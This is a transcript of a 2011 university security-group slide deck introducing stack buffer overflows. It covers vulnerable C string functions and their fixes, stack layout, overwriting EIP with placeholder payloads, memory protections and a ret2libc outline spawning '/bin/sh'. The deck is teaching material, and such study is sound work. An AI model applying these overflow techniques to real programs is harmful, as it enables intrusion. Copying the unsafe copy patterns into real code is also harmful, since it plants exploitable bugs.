intro to exploitation stack overflows

28
Intro to Exploitation Stack Overflows James McFadyen UTD Computer Security Group 10/20/2011

Upload: phiala

Post on 04-Feb-2016

62 views

Category:

Documents


0 download

DESCRIPTION

Intro to Exploitation Stack Overflows. James McFadyen UTD Computer Security Group 10/20/2011. Intro to Exploitation. Only an intro to stack overflow Basic theory and application One of many types of exploitation. Outline. What is a buffer overflow? Tools Vulnerable C Functions - PowerPoint PPT Presentation

TRANSCRIPT

Page 1: Intro to Exploitation  Stack Overflows

Intro to Exploitation Stack Overflows

James McFadyen UTD Computer Security Group

10/20/2011

Page 2: Intro to Exploitation  Stack Overflows

Intro to Exploitation

Only an intro to stack overflow Basic theory and application One of many types of exploitation

Page 3: Intro to Exploitation  Stack Overflows

Outline

What is a buffer overflow? Tools Vulnerable C Functions Remember the memory Learn to love assembly Stack overflow Protection Mechanisms ret2libc in Linux

Page 4: Intro to Exploitation  Stack Overflows

Buffer Overflow

“In computer security and programming, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory. This is a special case of violation of memory safety.” - Wikipedia

Page 5: Intro to Exploitation  Stack Overflows

Buffer Overflow

In our examples.. Give the program too much input, hijack the

instruction pointer (EIP) Control EIP Execute arbitrary code locally or remotely Achieve what we want as elevated user

Page 6: Intro to Exploitation  Stack Overflows

Tools

Linux GDB, gcc, vi, perl/python/ruby, readelf,

objdump, ltrace, strace, ropeme Windows

WinDBG, OllyDBG, ImmunityDBG, IDA, Python, Mona (ImmunityDBG plugin)

Page 7: Intro to Exploitation  Stack Overflows

Vulnerable C Code

strcpy(), strncpy() strcat(), strncat() sprintf(), snprintf() gets() sscanf() Many others...

Page 8: Intro to Exploitation  Stack Overflows

Vulnerable C Code

strcpy() doesn't check size If we have

char buf[128];

strcpy(buf, userSuppliedString);

This makes it too easy...

Page 9: Intro to Exploitation  Stack Overflows

Vulnerable C Code

char *strncpy(char *dest, const char *src, size_t n);

We have a size, but what if..

strncpy(somebuffer, str, strlen(str)); or..

strncpy(somebuffer, str, sizeof(somebuffer)); Where str is supplied by user

Page 10: Intro to Exploitation  Stack Overflows

Vulnerable C Code

Common bug, proper fix:

strncpy(somebuffer, str, sizeof(somebuffer)-1);

Page 11: Intro to Exploitation  Stack Overflows

Vulnerable C Code

char *strncat(char *dest, const char *src, size_t n); Ex:

int vulnerable(char *str1, char *str2)

{

char buf[256];

strncpy(buf, str1, 100);

strncat(buf, str2, sizeof(buf)-1);

return;

}

Page 12: Intro to Exploitation  Stack Overflows

Vulnerable C Code

Fix: strncat(buf, str2, sizeof(buf) - strlen(buf) -1);

Page 13: Intro to Exploitation  Stack Overflows

Remember the Memory

Text

Data

BSS

Heap

Stack

Initialized global and static variables

Uninitialized global and static variables

Program scratch space. Local variables, pass arguments, etc..

Code segment, machine instr.

Dynamic space.malloc(...) / free(...)new(...) / ~

Low

High * Taken from Mitchell Adair's “Stack Overflows”

Page 14: Intro to Exploitation  Stack Overflows

Remember the Memory: The Stack

ESP

EBP

RET

arguments...previous stack frame

local variables ...

High

Low

EBP

EBP - x

EBP + x

* Taken from Mitchell Adair's “Stack Overflows”

Page 15: Intro to Exploitation  Stack Overflows

Love the Assembly

EIP – Extended Instruction Pointer

ESP – Extended Stack Pointer

EBP – Extended Base Pointer

EAX

ECX

EDX

ESI

EDI

Next Instruction executed

Data register

Source index

Destination Index

Counter register

Accumulator register

EBX Base register

Top of stack

Base Pointer

* Taken from Mitchell Adair's “Stack Overflows”

Page 16: Intro to Exploitation  Stack Overflows

Stack Overflow

ESP

EBP

RET

argc

*argv[]

EBP

char buf[100]

100 bytes

4 bytes

4 bytes

* Taken from Mitchell Adair's “Stack Overflows”

Page 17: Intro to Exploitation  Stack Overflows

Stack Overflow

ESP

EBP

RET

argc

*argv[]

EBP

100 bytes

4 bytes

4 bytesRET overwrittenRET

108 bytes( 0x41 * 108)

Ret will pop the instruction pointeroff of the stack

EIP will now point to 0x41414141

Ex: $ ./program $(python -c 'print "A" * 108 ')

* Taken from Mitchell Adair's “Stack Overflows”

Page 18: Intro to Exploitation  Stack Overflows

Stack Overflow

ESP

EBP

RET

argc

*argv[]

EBP

100 bytes

4 bytes

4 bytes0xdeadbeefRET

104 bytes( 0x41 * 104

EIP will now point to 0xdeadbeef

We can now point EIP where we want

Ex: $ ./program $(python -c 'print "A" * 104 + “\xef\xbe\xad\xde” ')

* Taken from Mitchell Adair's “Stack Overflows”

Page 19: Intro to Exploitation  Stack Overflows

Stack Overflow

$ ./program $(python -c 'print "A" * 104 + “\xef\xbe\xad\xde” ')

We have 104 bytes for a payload

Payload can be anything, but for our purpose we would spawn a shell

The payload will be fixed size, so when we insert it, we must reduce the # of A's by the size of the payload

Page 20: Intro to Exploitation  Stack Overflows

Stack Overflow

$ ./program $(python -c 'print "A" * 104 + “\xef\xbe\xad\xde” ')

If we had a 32 byte payload .. (real payload will not be a bunch of \xff)

$ ./program $(python -c 'print "A" * 72 + “\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff” + “\xef\xbe\xad\xde” ')

We have adjusted the buffer so the payload will fit We will then have to point EIP (\xef\xbe\xad\xde) to our

payload on the stack

Page 21: Intro to Exploitation  Stack Overflows

Stack Overflow

$ ./program $(python -c 'print "A" * 72 + “\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff” + “\xef\xbe\xad\xde” ')

“\xef\xbe\xad\xde” would be replaced with the address of our payload

EIP will now point to the address of our payload, which will spawn a shell

NOPs help create a bigger “landing area” This technique is not very effective anymore...

why?

Page 22: Intro to Exploitation  Stack Overflows

Protection Mechanisms (Windows)

DEP – Data execution Prevention Can't execute on the stack

/GS Flag – cookie / canary detects if stack has been altered

SafeSEH – Structured Exception Handler Try / except, catches exceptions

ASLR - Address Space Layout Randomization

Randomizes addresses in memory

Page 23: Intro to Exploitation  Stack Overflows

Protection Mechanisms (Linux)

NX – Stack Execute Invalidation Processor feature Like DEP, can't execute on the stack

Stack Smashing Protection – cookie / canary Generally enabled by default

ASLR - Address Space Layout Randomization

Many other compiler protections...

Page 24: Intro to Exploitation  Stack Overflows

ret2libc

Bypasses NX Point EIP to a function in libc

system(), exec() etc... system(“/bin/sh”);

We will get a shell by using the system() function in libc

Page 25: Intro to Exploitation  Stack Overflows

ret2libc

$ ./program $(python -c 'print "A" * 104 + “\xef\xbe\xad\xde” ')

We don't need the payload where the A's are anymore

We now will point EIP to the address of system(), then the next 4 bytes will be a return address, followed by system() arguments (which will be /bin/sh)

$ ./program $(python -c 'print "A" * 104 + address_of_system + return_address + payload ')

Page 26: Intro to Exploitation  Stack Overflows

Demo!

How to use GDB for exploitation Exploring the stack Finding important memory addresses

(ret2libc) Breakpoints Using Perl/Python/Ruby for arguments in GDB

Basic Stack Overflow Ret2libc

Page 27: Intro to Exploitation  Stack Overflows

Additional Resources

https://www.corelan.be/index.php/articles/ http://beej.us/guide/bggdb/ http://en.wikibooks.org/wiki/X86_Assembly http://www.alexonlinux.com/how-debugger-w

orks http://smashthestack.org/ http://intruded.net/

Page 28: Intro to Exploitation  Stack Overflows

Sources

“Source Code Auditing” - Jared Demott “Smashing the stack in 2010” - Andrea

Cugliari + Mariano Graziano “Stack Overflows” - Mitchell Adair http://en.wikipedia.org/wiki/Buffer_overflow http://en.wikipedia.org/wiki/Return-to-libc_atta

ck